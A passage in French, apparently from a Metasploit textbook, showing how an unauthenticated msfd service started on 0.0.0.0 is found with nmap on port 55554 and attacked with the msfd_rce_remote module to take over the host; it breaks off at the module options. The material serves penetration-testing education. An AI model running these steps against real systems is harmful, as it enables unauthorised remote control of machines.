Exploitation de Metasploit par Metasploit Metasploit:exploitation par Metasploit
Chose promise, chose due ! Au chapitre Premiers pas avec Metasploit à la section Les interfaces, nous avons abordé Msfd et les problèmes de sécurité y étant liés. Msfd
Le lancement du service se fait de la manière suivante :
root@kali:~# msfd -a 0.0.0.0
[*] Initializing msfd...
[*] Running msfd...
Sur la machine de l’attaquant, il est possible de vérifier la présence de ce port grâce à un scan de ports classique :
root@kali:~# nmap -p 55554 192.168.171.144
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-28 19:29 CET
Nmap scan report for 192.168.171.144
Host is up (0.000050s latency).
PORT STATE SERVICE
55554/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Dès lors, il est possible d’utiliser l’un des exploits précisés précédemment afin de prendre le contrôle de la machine distante grâce à l’absence d’authentification :
msf6 > use exploit/multi/misc/msfd_rce_remote
msf6 exploit(multi/misc/msfd_rce_remote) >show options
Module options (exploit/multi/misc/msfd_rce_remote):
Name Current Setting Required Description
---- --------------- ...